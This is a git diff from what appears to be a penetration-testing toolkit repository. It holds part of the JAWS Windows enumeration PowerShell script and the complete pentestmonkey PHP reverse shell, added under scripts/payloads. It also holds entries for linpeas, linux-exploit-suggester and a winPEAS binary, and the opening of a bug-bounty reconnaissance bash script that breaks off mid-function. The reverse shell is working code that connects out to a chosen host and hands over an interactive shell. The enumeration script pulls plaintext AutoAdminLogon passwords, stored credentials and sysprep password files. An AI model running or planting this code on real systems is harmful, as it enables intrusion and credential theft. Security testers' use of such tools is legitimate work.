$output = $output + "## https://github.com/411Hall/JAWS ##`r`n"
|
||||
$output = $output + "## ##`r`n"
|
||||
$output = $output + "############################################################`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$win_version = (Get-WmiObject -class Win32_OperatingSystem)
|
||||
$output = $output + "Windows Version: " + (($win_version.caption -join $win_version.version) + "`r`n")
|
||||
$output = $output + "Architecture: " + (($env:processor_architecture) + "`r`n")
|
||||
$output = $output + "Hostname: " + (($env:ComputerName) + "`r`n")
|
||||
$output = $output + "Current User: " + (($env:username) + "`r`n")
|
||||
$output = $output + "Current Time\Date: " + (get-date)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Gathering User Information"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Users`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
|
||||
$adsi.Children | where {$_.SchemaClassName -eq 'user'} | Foreach-Object {
|
||||
$groups = $_.Groups() | Foreach-Object {$_.GetType().InvokeMember("Name", 'GetProperty', $null, $_, $null)}
|
||||
$output = $output + "----------`r`n"
|
||||
$output = $output + "Username: " + $_.Name + "`r`n"
|
||||
$output = $output + "Groups: " + $groups + "`r`n"
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Network Information`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (ipconfig | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Arp`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (arp -a | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " NetStat`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (netstat -ano | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Firewall Status`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$Firewall = New-Object -com HNetCfg.FwMgr
|
||||
$FireProfile = $Firewall.LocalPolicy.CurrentProfile
|
||||
if ($FireProfile.FirewallEnabled -eq $False) {
|
||||
$output = $output + ("Firewall is Disabled" + "`r`n")
|
||||
} else {
|
||||
$output = $output + ("Firwall is Enabled" + "`r`n")
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " FireWall Rules`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
Function Get-FireWallRule
|
||||
{Param ($Name, $Direction, $Enabled, $Protocol, $profile, $action, $grouping)
|
||||
$Rules=(New-object -comObject HNetCfg.FwPolicy2).rules
|
||||
If ($name) {$rules= $rules | where-object {$_.name -like $name}}
|
||||
If ($direction) {$rules= $rules | where-object {$_.direction -eq $direction}}
|
||||
If ($Enabled) {$rules= $rules | where-object {$_.Enabled -eq $Enabled}}
|
||||
If ($protocol) {$rules= $rules | where-object {$_.protocol -eq $protocol}}
|
||||
If ($profile) {$rules= $rules | where-object {$_.Profiles -bAND $profile}}
|
||||
If ($Action) {$rules= $rules | where-object {$_.Action -eq $Action}}
|
||||
If ($Grouping) {$rules= $rules | where-object {$_.Grouping -like $Grouping}}
|
||||
$rules}
|
||||
$output = $output + (Get-firewallRule -enabled $true | sort direction,applicationName,name | format-table -property Name , localPorts,applicationname | out-string)
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Hosts File Content`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + ((get-content $env:windir\System32\drivers\etc\hosts | out-string) + "`r`n")
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Gathering Processes, Services and Scheduled Tasks"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Processes`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + ((Get-WmiObject win32_process | Select-Object Name,ProcessID,@{n='Owner';e={$_.GetOwner().User}},CommandLine | sort name | format-table -wrap -autosize | out-string) + "`r`n")
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Scheduled Tasks`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + "Current System Time: " + (get-date)
|
||||
$output = $output + (schtasks /query /FO CSV /v | convertfrom-csv | where { $_.TaskName -ne "TaskName" } | select "TaskName","Run As User", "Task to Run" | fl | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Services`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (get-service | Select Name,DisplayName,Status | sort status | Format-Table -Property * -AutoSize | Out-String -Width 4096)
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Gathering Installed Software"
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Installed Programs`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (get-wmiobject -Class win32_product | select Name, Version, Caption | ft -hidetableheaders -autosize| out-string -Width 4096)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Installed Patches`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (Get-Wmiobject -class Win32_QuickFixEngineering -namespace "root\cimv2" | select HotFixID, InstalledOn| ft -autosize | out-string )
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Program Folders`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + "`n`rC:\Program Files`r`n"
|
||||
$output = $output + "-------------"
|
||||
$output = $output + (get-childitem "C:\Program Files" -EA SilentlyContinue | select Name | ft -hidetableheaders -autosize| out-string)
|
||||
$output = $output + "C:\Program Files (x86)`r`n"
|
||||
$output = $output + "-------------------"
|
||||
$output = $output + (get-childitem "C:\Program Files (x86)" -EA SilentlyContinue | select Name | ft -hidetableheaders -autosize| out-string)
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Gathering File System Information"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Files with Full Control and Modify Access`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$files = get-childitem C:\
|
||||
foreach ($file in $files){
|
||||
try {
|
||||
$output = $output + (get-childitem "C:\$file" -include *.ps1,*.bat,*.com,*.vbs,*.txt,*.html,*.conf,*.rdp,.*inf,*.ini -recurse -EA SilentlyContinue | get-acl -EA SilentlyContinue | select path -expand access |
|
||||
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|EVERYONE|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
|
||||
ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
|
||||
}
|
||||
catch {
|
||||
$output = $output + "`nFailed to read more files`r`n"
|
||||
}
|
||||
}
|
||||
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Folders with Full Control and Modify Access`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$folders = get-childitem C:\
|
||||
foreach ($folder in $folders){
|
||||
try {
|
||||
$output = $output + (Get-ChildItem -Recurse "C:\$folder" -EA SilentlyContinue | ?{ $_.PSIsContainer} | get-acl | select path -expand access |
|
||||
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
|
||||
select path,filesystemrights,IdentityReference | ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
|
||||
}
|
||||
catch {
|
||||
$output = $output + "`nFailed to read more folders`r`n"
|
||||
}
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Mapped Drives`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (Get-WmiObject -Class Win32_LogicalDisk | select DeviceID, VolumeName | ft -hidetableheaders -autosize | out-string -Width 4096)
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Unquoted Service Paths`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (cmd /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """')
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Recent Documents`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (get-childitem "C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Recent" -EA SilentlyContinue | select Name | ft -hidetableheaders | out-string )
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Potentially Interesting Files in Users Directory `r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (get-childitem "C:\Users\" -recurse -Include *.zip,*.rar,*.7z,*.gz,*.conf,*.rdp,*.kdbx,*.crt,*.pem,*.ppk,*.txt,*.xml,*.vnc.*.ini,*.vbs,*.bat,*.ps1,*.cmd -EA SilentlyContinue | %{$_.FullName } | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " 10 Last Modified Files in C:\User`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (Get-ChildItem 'C:\Users' -recurse -EA SilentlyContinue | Sort {$_.LastWriteTime} | %{$_.FullName } | select -last 10 | ft -hidetableheaders | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " MUICache Files`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
get-childitem "HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\" -EA SilentlyContinue |
|
||||
foreach { $CurrentKey = (Get-ItemProperty -Path $_.PsPath)
|
||||
if ($CurrentKey -match "C:\\") {
|
||||
$output = $output + ($_.Property -join "`r`n")
|
||||
}
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Looking for Simple Priv Esc Methods"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " System Files with Passwords`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$files = ("unattended.xml", "sysprep.xml", "autounattended.xml","unattended.inf", "sysprep.inf", "autounattended.inf","unattended.txt", "sysprep.txt", "autounattended.txt")
|
||||
$output = $output + (get-childitem C:\ -recurse -include $files -EA SilentlyContinue | Select-String -pattern "<Value>" | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " AlwaysInstalledElevated Registry Key`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$HKLM = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer"
|
||||
$HKCU = "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer"
|
||||
if (($HKLM | test-path) -eq "True")
|
||||
{
|
||||
if (((Get-ItemProperty -Path $HKLM -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
|
||||
{
|
||||
$output = $output + "AlwaysInstallElevated enabled on this host!"
|
||||
}
|
||||
}
|
||||
if (($HKCU | test-path) -eq "True")
|
||||
{
|
||||
if (((Get-ItemProperty -Path $HKCU -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
|
||||
{
|
||||
$output = $output + "AlwaysInstallElevated enabled on this host!"
|
||||
}
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Stored Credentials`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (cmdkey /list | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Checking for AutoAdminLogon `r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$Winlogon = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
|
||||
if (get-itemproperty -path $Winlogon -Name AutoAdminLogon -ErrorAction SilentlyContinue)
|
||||
{
|
||||
if ((get-itemproperty -path $Winlogon -Name AutoAdminLogon).AutoAdminLogon -eq 1)
|
||||
{
|
||||
$Username = (get-itemproperty -path $Winlogon -Name DefaultUserName).DefaultUsername
|
||||
$output = $output + "The default username is $Username `r`n"
|
||||
$Password = (get-itemproperty -path $Winlogon -Name DefaultPassword).DefaultPassword
|
||||
$output = $output + "The default password is $Password `r`n"
|
||||
$DefaultDomainName = (get-itemproperty -path $Winlogon -Name DefaultDomainName).DefaultDomainName
|
||||
$output = $output + "The default domainname is $DefaultDomainName `r`n"
|
||||
}
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
if ($OutputFilename.length -gt 0)
|
||||
{
|
||||
$output | Out-File -FilePath $OutputFileName -encoding utf8
|
||||
}
|
||||
else
|
||||
{
|
||||
clear-host
|
||||
write-output $output
|
||||
}
|
||||
}
|
||||
|
||||
if ($OutputFilename.length -gt 0)
|
||||
{
|
||||
Try
|
||||
{
|
||||
[io.file]::OpenWrite($OutputFilename).close()
|
||||
JAWS-ENUM
|
||||
}
|
||||
Catch
|
||||
{
|
||||
Write-Warning "`nUnable to write to output file $OutputFilename, Check path and permissions"
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
JAWS-ENUM
|
||||
}
|
||||
8579
scripts/payloads/linpeas.sh
Normal file
8579
scripts/payloads/linpeas.sh
Normal file
File diff suppressed because one or more lines are too long
2696
scripts/payloads/linux-exploit-suggester.sh
Normal file
2696
scripts/payloads/linux-exploit-suggester.sh
Normal file
File diff suppressed because it is too large
Load diff
192
scripts/payloads/php-reverse-shell.php
Normal file
192
scripts/payloads/php-reverse-shell.php
Normal file
|
|
@ -0,0 +1,192 @@
|
|||
<?php
|
||||
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. The author accepts no liability
|
||||
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||
// do not use this tool.
|
||||
//
|
||||
// In all other respects the GPL version 2 applies:
|
||||
//
|
||||
// This program is free software; you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License version 2 as
|
||||
// published by the Free Software Foundation.
|
||||
//
|
||||
// This program is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
//
|
||||
// You should have received a copy of the GNU General Public License along
|
||||
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. If these terms are not acceptable to
|
||||
// you, then do not use this tool.
|
||||
//
|
||||
// You are encouraged to send comments, improvements or suggestions to
|
||||
// me at pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// Description
|
||||
// -----------
|
||||
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||
// The recipient will be given a shell running as the current user (apache normally).
|
||||
//
|
||||
// Limitations
|
||||
// -----------
|
||||
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||
//
|
||||
// Usage
|
||||
// -----
|
||||
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||
|
||||
set_time_limit (0);
|
||||
$VERSION = "1.0";
|
||||
$ip = '127.0.0.1'; // CHANGE THIS
|
||||
$port = 1234; // CHANGE THIS
|
||||
$chunk_size = 1400;
|
||||
$write_a = null;
|
||||
$error_a = null;
|
||||
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||
$daemon = 0;
|
||||
$debug = 0;
|
||||
|
||||
//
|
||||
// Daemonise ourself if possible to avoid zombies later
|
||||
//
|
||||
|
||||
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||
// our php process and avoid zombies. Worth a try...
|
||||
if (function_exists('pcntl_fork')) {
|
||||
// Fork and have the parent process exit
|
||||
$pid = pcntl_fork();
|
||||
|
||||
if ($pid == -1) {
|
||||
printit("ERROR: Can't fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ($pid) {
|
||||
exit(0); // Parent exits
|
||||
}
|
||||
|
||||
// Make the current process a session leader
|
||||
// Will only succeed if we forked
|
||||
if (posix_setsid() == -1) {
|
||||
printit("Error: Can't setsid()");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
$daemon = 1;
|
||||
} else {
|
||||
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||
}
|
||||
|
||||
// Change to a safe directory
|
||||
chdir("/");
|
||||
|
||||
// Remove any umask we inherited
|
||||
umask(0);
|
||||
|
||||
//
|
||||
// Do the reverse shell...
|
||||
//
|
||||
|
||||
// Open reverse connection
|
||||
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||
if (!$sock) {
|
||||
printit("$errstr ($errno)");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Spawn shell process
|
||||
$descriptorspec = array(
|
||||
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||
);
|
||||
|
||||
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||
|
||||
if (!is_resource($process)) {
|
||||
printit("ERROR: Can't spawn shell");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Set everything to non-blocking
|
||||
// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||
stream_set_blocking($pipes[0], 0);
|
||||
stream_set_blocking($pipes[1], 0);
|
||||
stream_set_blocking($pipes[2], 0);
|
||||
stream_set_blocking($sock, 0);
|
||||
|
||||
printit("Successfully opened reverse shell to $ip:$port");
|
||||
|
||||
while (1) {
|
||||
// Check for end of TCP connection
|
||||
if (feof($sock)) {
|
||||
printit("ERROR: Shell connection terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Check for end of STDOUT
|
||||
if (feof($pipes[1])) {
|
||||
printit("ERROR: Shell process terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Wait until a command is end down $sock, or some
|
||||
// command output is available on STDOUT or STDERR
|
||||
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||
|
||||
// If we can read from the TCP socket, send
|
||||
// data to process's STDIN
|
||||
if (in_array($sock, $read_a)) {
|
||||
if ($debug) printit("SOCK READ");
|
||||
$input = fread($sock, $chunk_size);
|
||||
if ($debug) printit("SOCK: $input");
|
||||
fwrite($pipes[0], $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDOUT
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[1], $read_a)) {
|
||||
if ($debug) printit("STDOUT READ");
|
||||
$input = fread($pipes[1], $chunk_size);
|
||||
if ($debug) printit("STDOUT: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDERR
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[2], $read_a)) {
|
||||
if ($debug) printit("STDERR READ");
|
||||
$input = fread($pipes[2], $chunk_size);
|
||||
if ($debug) printit("STDERR: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
}
|
||||
|
||||
fclose($sock);
|
||||
fclose($pipes[0]);
|
||||
fclose($pipes[1]);
|
||||
fclose($pipes[2]);
|
||||
proc_close($process);
|
||||
|
||||
// Like print, but does nothing if we've daemonised ourself
|
||||
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||
function printit ($string) {
|
||||
if (!$daemon) {
|
||||
print "$string\n";
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
|
||||
|
||||
BIN
scripts/payloads/winPEASany_ofs.exe
Normal file
BIN
scripts/payloads/winPEASany_ofs.exe
Normal file
Binary file not shown.
264
scripts/pentesting/bb-recon
Executable file
264
scripts/pentesting/bb-recon
Executable file
|
|
@ -0,0 +1,264 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: bb-recon
|
||||
# Description: Bug-bounty-safe web application reconnaissance
|
||||
# Usage: bb-recon <url>
|
||||
# Creates tmux window with parallel safe recon (nuclei info/low, katana, subdomain takeover)
|
||||
# Based on Jason Haddix's Bug Hunter Methodology
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}bb-recon${NC} - Bug Bounty Reconnaissance v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " bb-recon <url>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Bug-bounty-safe web reconnaissance with 4 parallel panes:"
|
||||
echo " - Pane 1 (top-left): Nuclei (info/low + subdomain takeover)"
|
||||
echo " - Pane 2 (top-right): httpx (technology detection + security headers)"
|
||||
echo " - Pane 3 (bottom-left): Katana (JS-aware crawler for endpoint discovery)"
|
||||
echo " - Pane 4 (bottom-right): Live results dashboard"
|
||||
echo
|
||||
echo -e "${BOLD}BUG BOUNTY PHILOSOPHY:${NC}"
|
||||
echo " Based on Jason Haddix's Bug Hunter Methodology:"
|
||||
echo " - Find FEATURES first, bugs second"
|
||||
echo " - Focus on interactive, dynamic applications"
|
||||
echo " - Conservative tools only (no exploitation)"
|
||||
echo " - Discovery over brute-forcing"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " bb-recon https://target.com"
|
||||
echo " bb-recon https://bugcrowd-target.com"
|
||||
echo " bb-recon https://h1-program.hackerone.net"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./bb-recon-<target>-<timestamp>/"
|
||||
echo
|
||||
echo -e "${BOLD}SAFE FOR BUG BOUNTY:${NC}"
|
||||
echo " ✓ No directory brute-forcing (Feroxbuster removed)"
|
||||
echo " ✓ No parameter fuzzing (Arjun removed)"
|
||||
echo " ✓ Info/Low severity only (no exploit templates)"
|
||||
echo " ✓ JS analysis for endpoint discovery (passive)"
|
||||
echo " ✓ Subdomain takeover checks (safe)"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
local optional_missing=()
|
||||
|
||||
# Core tools
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
|
||||
# Bug bounty tools (all optional but recommended)
|
||||
command -v nuclei &>/dev/null || optional_missing+=("nuclei")
|
||||
command -v katana &>/dev/null || optional_missing+=("katana")
|
||||
command -v httpx &>/dev/null || optional_missing+=("httpx")
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||
echo -e "${CYAN}Install with:${NC}"
|
||||
for tool in "${optional_missing[@]}"; do
|
||||
case "$tool" in
|
||||
nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
|
||||
katana) echo " go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
|
||||
httpx) echo " go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest" ;;
|
||||
esac
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir() {
|
||||
local url="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
OUTPUT_DIR="bb-recon-${clean_url}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Main bug bounty recon function
|
||||
run_bb_recon() {
|
||||
local url="$1"
|
||||
|
||||
# Ensure URL has http:// or https://
|
||||
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||
url="https://$url"
|
||||
echo -e "${YELLOW}⚠${NC} No protocol specified, using HTTPS: $url"
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Bug Bounty Reconnaissance (Safe Mode) ║"
|
||||
echo "║ Target: $url"
|
||||
echo "║ Based on: Jason Haddix's Methodology ║"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$url"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||
run_scans_sequential "$url"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window
|
||||
WINDOW_NAME="--> BB: ${url:0:20}... <--"
|
||||
tmux new-window -n "$WINDOW_NAME"
|
||||
|
||||
# Split into 4 panes with explicit targeting
|
||||
# Layout: 2x2 grid with pipelines and live monitoring
|
||||
# ACTUAL pane numbers after splits: 1, 2, 3, 4 (no pane 0!)
|
||||
# [1: nuclei] [2: feroxbuster → arjun]
|
||||
# [3: katana] [4: live dashboard]
|
||||
|
||||
# Create 2x2 grid layout
|
||||
# CRITICAL: Tmux pane numbering behavior discovered through testing:
|
||||
# Step 1: split-window -h creates [0:left] [1:right]
|
||||
# Step 2: select pane 0, split-window -v creates [0:TL] [1:BL] [2:right]
|
||||
# Step 3: select pane 2, split-window -v creates [1:TL] [2:TR] [3:BL] [4:BR]
|
||||
#
|
||||
# PANE 0 DISAPPEARS during this process! Final panes are numbered 1, 2, 3, 4
|
||||
|
||||
# Split horizontally first (left | right)
|
||||
tmux split-window -h
|
||||
|
||||
# Split left column vertically
|
||||
tmux select-pane -t 0
|
||||
tmux split-window -v
|
||||
|
||||
# Split right column vertically (target pane 2 after left split)
|
||||
tmux select-pane -t 2
|
||||
tmux split-window -v
|
||||
|
||||
# Force tiled layout for perfect 2x2 grid (equal-sized panes)
|
||||
tmux select-layout tiled
|
||||
|
||||
# Final verified pane layout after tmux renumbering and tiled layout:
|
||||
# 1 (top-left) 2 (top-right)
|
||||
# 3 (bottom-left) 4 (bottom-right)
|
||||
|
||||
# Send commands to each pane with ACTUAL pane numbers after splits
|
||||
# After all splits complete, tmux renumbers panes as: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
|
||||
# (pane 0 disappears during the splitting process)
|
||||
|
||||
# Pane 1 (top-left): Nuclei (info/low severity + subdomain takeover)
|
||||
tmux select-pane -t 1
|
||||
if command -v nuclei &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting Nuclei scan (info/low + subdomain takeover)...${NC}' && nuclei -u '$url' -s info,low -t exposed-panels/ -t exposures/ -t misconfiguration/ -t technologies/ -t takeovers/ -t subdomain-takeover/ -o nuclei.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 2 (top-right): httpx technology detection and security headers
|
||||
tmux select-pane -t 2
|
||||
if command -v httpx &>/dev/null; then
|
||||
